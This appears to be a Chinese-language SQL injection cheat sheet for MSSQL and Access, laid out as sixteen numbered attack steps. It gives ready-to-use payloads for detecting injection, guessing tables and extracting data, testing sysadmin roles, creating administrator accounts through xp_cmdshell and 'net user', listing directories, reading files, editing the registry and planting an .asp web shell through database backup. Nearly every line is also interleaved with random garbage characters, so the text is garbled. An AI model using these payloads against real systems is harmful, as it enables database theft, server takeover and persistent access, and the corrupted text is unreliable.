1.判断是否有注入;and 1=1 ;and 1=2 hm*cGYV/
2.初步判断是否是mssql ;and user>0 uc>":V
;
I;&O5Y
3.注入参数是字符'and [查询条件] and ''=' \i'Z(1
@V&c=8)8
4.搜索时没过滤参数的'and [查询条件] and '%25'=' FS)"MDs
*
'_(.Z:
5.判断数据库系统 '^.`mT'P
9Vru,7g
;and (select count(*) from sysobjects)>0 mssql 5%%e$o+
4`B3Kt`o
;and (select count(*) from msysobjects)>0 access "ze-Mb
} J[Z)u
PU,%Y_xR
UCt}\IJ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 a$j ~YUG_
)qRH?Hsb7
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 "Ccyj /
16ZyLt
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 F8S>Ld
f{.4#C'
9.(1)猜字段的ascii值(access) PjD9D.
i\,I)S%yJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 q6,z 1A"
|h?2~D!+d
(2)猜字段的ascii值(mssql) +CM>]Ze
Fw S>V2R
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 \xlG 3nz
{Q}F.0Q
10.测试权限结构(mssql) L>h|1ZK
yQ)&u+r
A;<wv>T
B[I9<4}
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [j}JCmWY
_i_P@I<M|~
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- z2>LjM)
#
[l3ys
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 57~y 7/ 0
Ptc+ypTu
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- D4b-Y[/"
VV{>Kq+&,v
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- RA!q)/+
/5<= m:
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- P6&%`$
egvb#:zW?
;and 1=(select IS_MEMBER('db_owner'));-- ua)jGif
m"T}em#
ftG3!}
o]Xt2E
11.添加mssql和系统的帐户 41x"Q?.bY
a'-u(Bw
;exec master.dbo.sp_addlogin username;-- d:kn%L6k_
;exec master.dbo.sp_password null,username,password;-- ae2Q^yLA
lYTQg~aPm
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- d[>HxPwo
[~u!*W
;exec master.dbo.xp_cmdshell 'net user username password *s,[Uy![
lLp,sNAj
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- RC/45:hZZ
(6.uNLr
;exec master.dbo.xp_cmdshell 'net user username password /add';-- f~F{@),acZ
z&WtPSyGj
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 2E?!Q I\O
ESNI$[`
@ 5^nrB
a}uYv:
12.(1)遍历目录 hLbWqF
xorafL
;create table dirs(paths varchar(100), id int) qm3H/cC9+
W|D
kq
;insert dirs exec master.dbo.xp_dirtree 'c:\' m`l9d4p
w?
x9,jXd
;and (select top 1 paths from dirs)>0 .[}G{%M~[
F#>00b{Q
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) {vGJ}q?Sd"
zGFD71=#
i84!x%|P
MoE&)~0u&
(2)遍历目录 (c>g7d<>n
W&=OtN
U!
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- UrHndnqM
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 1_<x%>zG
59O-"Sc[
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 s(nT7x+W
b,^Gj]7
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 0|RofL&o
?+))J~@t
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 CVWT>M<
+rJ6DZ
~W [I
~L"$(^/
13.mssql中的存储过程 $'%GB $.
QXZyiJX}
xp_regenumvalues 注册表根键, 子键
v&|65[<
`Bw]PO
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 "bIb?e2h9G
Bl*}*S PU
xp_regread 根键,子键,键值名 Y@`uBB[
U
fyhd
;exec xp_regread 6,A|9UX=`
F?|Efpzow?
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 *m}8L%<HT
X>Vc4n<}
xp_regwrite 根键,子键, 值名, 值类型, 值 W|7|XO
\c
-m\|
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 HiA E9
Vw1>d+<~-)
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 }! EVf
dgjK\pH`h
xp_regdeletevalue 根键,子键,值名 -B H/)$-$
O|V0WiY<
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 B=!!R]dxA
7ocUFY0"
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ZQ]qJDk
mUa#sTm
zak\%yY`
Z0fa;%:
14.mssql的backup创建webshell AP=h*1udk
3'Y-~^ml|
use model ^Hv&{r77
W;Y^(f
create table cmd(str image); M
bWby'
=I`S7oF
insert into cmd(str) values (''); }6@E3z]AMO
hBjU(}\3
backup database model to disk='c:\l.asp'; 6u0>3-[6OD
#NW+t|E
Jt=->
!+%gJiu:
15.mssql内置函数 [UA*We 1
Jh3
;and (select @@version)>0 获得Windows的版本号 P |tyyjO
>$JE!.p%o
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Y(g_h:lf,]
Z 2N6r6
;and (select user_name())>0 爆当前系统的连接用户 TQ]gvi|m
+@Qr GY
;and (select db_name())>0 得到当前连接的数据库 gx.\H3y
}PBme'kP
ENZym
J'}+0mln
16.简洁的webshell m$p}cok#+S
l8FJ \5'M
use model 5vyg-'
s<zN`&t
create table cmd(str image); lxyTh'
)8A.Wg4S;c
insert into cmd(str) values (''); &DWSf`:Hx
+]eG=.
u
backup database model to disk='g:\wwwtest\l.asp';